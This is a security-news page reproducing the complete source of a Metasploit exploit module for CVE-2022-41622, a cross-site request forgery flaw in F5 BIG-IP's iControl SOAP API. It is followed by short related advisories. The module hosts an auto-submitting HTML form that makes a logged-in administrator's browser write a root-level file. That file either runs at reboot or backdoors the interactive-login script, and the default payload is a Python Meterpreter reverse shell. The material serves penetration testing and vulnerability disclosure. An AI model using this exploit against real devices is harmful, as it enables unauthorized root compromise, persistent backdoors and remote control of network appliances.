Security
Headlines
HeadlinesLatestCVEs

Headline

F5 BIG-IP iControl Cross Site Request Forgery

This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP’s iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.

Packet Storm
#csrf#vulnerability#web#linux#git#backdoor#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',        'Description' => %q{          This module exploits a cross-site request forgery (CSRF) vulnerability          in F5 Big-IP's iControl interface to write an arbitrary file to the          filesystem.          While any file can be written to any location as root, the          exploitability is limited by SELinux; the vast majority of writable          locations are unavailable. By default, we write to a script that          executes at reboot, which means the payload will execute the next time          the server boots.          An alternate target - Login - will add a backdoor that executes next          time a user logs in interactively. This overwrites a file,          but we restore it when we get a session          Note that because this is a CSRF vulnerability, it starts a web          server, but an authenticated administrator must visit the site, which          redirects them to the target.        },        'Author' => [          'Ron Bowes' # Discovery, PoC, and module        ],        'References' => [          ['CVE', '2022-41622'],          ['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],          ['URL', 'https://support.f5.com/csp/article/K97843387'],          ['URL', 'https://support.f5.com/csp/article/K94221585'],          ['URL', 'https://support.f5.com/csp/article/K05403841'],        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2022-11-16', # Vendor advisory        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Type' => :unix_cmd,        'Privileged' => true,        'Targets' => [          [ 'Restart', {}, ],          [ 'Login', {}, ],          [ 'Custom', {}, ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),        OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),        OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),        OptString.new('FILENAME', [false, 'The file on the target to overwrite (for "custom" target) - note that SELinux prevents overwriting a great deal of useful files']),      ]    )  end  def on_request_uri(socket, _request)    if datastore['TARGET'] == 0 # restart      filename = '/shared/f5_update_action'      file_payload = <<~EOT        UpdateAction        https://localhost/success`#{payload.encoded}`        https://localhost/error        0        0        0        0      EOT      # Delete the logfile if we get a session      register_file_for_cleanup('/var/log/f5_update_checker.out')      print_status("Redirecting the admin to overwrite #{filename}; if successful, your session will come approximately 2 minutes after the target is rebooted")    elsif datastore['TARGET'] == 1 # login      filename = '/var/run/config/timeout.sh'      file_payload = "#{payload.encoded} & disown;"      # Delete the backdoored file if we get a session.. this will be fixed at      # next reboot      register_file_for_cleanup('/var/run/config/timeout.sh')      print_status("Redirecting the admin to overwrite #{filename}; if successful, your session will come the next time a user logs in interactively")    else # Custom      filename = datastore['FILENAME']      file_payload = payload.encoded      print_status("Redirecting the admin to overwrite #{filename} with the payload")    end    # Build the SOAP request that'll be sent to the target server    csrf_payload = %(    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync">   <soapenv:Header/>   <soapenv:Body>      <con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">        <file_name xsi:type="xsd:string">#{filename}</file_name>         <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">            <!--type: Common.OctetSequence-->            <file_data xsi:type="urn:Common.OctetSequence">#{Rex::Text.encode_base64(file_payload)}</file_data>            <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>         </file_context>      </con:upload_file>   </soapenv:Body></soapenv:Envelope>    )    # Build the target URL    target_url = "#{datastore['TARGET_SSL'] ? 'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}"    # Build the HTML payload that'll send the SOAP request via the user's browser    html_payload = %(<html>    <body>        <form action="#{target_url}" method="POST" enctype="text/plain">            <textarea id="payload" name="<!--">-->#{Rex::Text.html_encode(csrf_payload)}</textarea>        </form>        <script>            document.forms[0].submit();        </script>    </body></html>    )    # Send the HTML to the browser    send_response(socket, html_payload, { 'Content-Type' => 'text/html' })  end  def exploit    # Sanity check    if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)      fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')    end    print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')    super  endend

Related news

F5 Big-IP Create Administrative User

This Metasploit module creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways.

CVE-2022-41800

In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2022-41622

In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

F5 BIG-IP iControl Remote Command Execution

This Metasploit module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution